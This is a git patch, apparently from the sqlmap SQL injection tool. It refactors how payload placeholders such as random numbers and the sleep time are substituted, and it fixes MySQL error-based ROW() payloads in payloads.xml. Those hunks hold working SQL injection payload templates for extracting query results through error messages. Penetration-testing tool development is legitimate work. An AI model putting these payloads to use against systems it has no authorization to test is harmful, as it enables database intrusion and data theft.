From 2538e2d5b4e1318d7741040d588569b9a798f6f0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 May 2012 09:33:22 +0000 Subject: [PATCH] fixing an issue with --file-read and ROW() MySQL payload (it's internal caching mechanism prevents error message if FROM part is not unique enough dumping only partial file content); minor refactoring --- lib/controller/checks.py | 3 --- lib/controller/controller.py | 2 +- lib/core/agent.py | 24 +++++++++++++----------- lib/request/connect.py | 2 +- lib/request/direct.py | 2 +- xml/payloads.xml | 8 ++++---- 6 files changed, 20 insertions(+), 21 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 749c9327e..d998524a2 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -488,9 +488,6 @@ def checkSqlInjection(place, parameter, value): if vector is None and "vector" in test and test.vector is not None: vector = "%s%s" % (test.vector, comment or "") - if method == PAYLOAD.METHOD.TIME: - reqPayload = reqPayload.replace(test.request.payload.replace("[SLEEPTIME]", str(conf.timeSec)), test.request.payload) - injection.data[stype] = AttribDict() injection.data[stype].title = title injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 1dc4dd88b..e60db4a93 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -138,7 +138,7 @@ def __formatInjection(inj): title = title.replace("columns", "column") data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Title: %s\n" % title - data += " Payload: %s\n" % (sdata.payload if stype not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) else sdata.payload.replace("[SLEEPTIME]", str(conf.timeSec))) + data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload) data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n" return data diff --git a/lib/core/agent.py b/lib/core/agent.py index f76aa1934..90650e6df 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -212,20 +212,19 @@ class Agent: if payload is None: return - randInt = randomInt() - randInt1 = randomInt() - randInt2 = randomInt() - randStr = randomStr() - randStr1 = randomStr() - _ = ( - ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDNUM2]", str(randInt2)), ("[RANDSTR]", randStr),\ - ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ + ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ ("[HASH_REPLACE]", kb.chars.hash_) ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) + for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): + payload = payload.replace(_, str(randomInt())) + + for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): + payload = payload.replace(_, randomStr()) + if origValue is not None: payload = payload.replace("[ORIGVALUE]", origValue) @@ -249,12 +248,15 @@ class Agent: return payload - def adjustSleepTime(self, payload): + def adjustLateValues(self, payload): """ - Returns payload with a replaced tag for SLEEPTIME + Returns payload with a replaced late tags (e.g. SLEEPTIME) """ - return payload.replace("[SLEEPTIME]", str(conf.timeSec)) if payload else payload + if payload: + payload = payload.replace("[SLEEPTIME]", str(conf.timeSec)) + + return payload def getComment(self, request): """ diff --git a/lib/request/connect.py b/lib/request/connect.py index 235d582ca..5af77e395 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -540,7 +540,7 @@ class Connect: raise404 = place != PLACE.URI if raise404 is None else raise404 - value = agent.adjustSleepTime(value) + value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() diff --git a/lib/request/direct.py b/lib/request/direct.py index 99c099fc6..02724a039 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -28,7 +28,7 @@ from lib.utils.timeout import timeout def direct(query, content=True): select = True query = agent.payloadDirect(query) - query = agent.adjustSleepTime(query) + query = agent.adjustLateValues(query) threadData = getCurrentThreadData() if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query: diff --git a/xml/payloads.xml b/xml/payloads.xml index 87bc7f186..f2e2f44c6 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1215,9 +1215,9 @@ Formats: 0 1 1 - AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x) + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x) - AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x) + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1433,9 +1433,9 @@ Formats: 2 1 2 - OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x) + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x) - OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x) + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]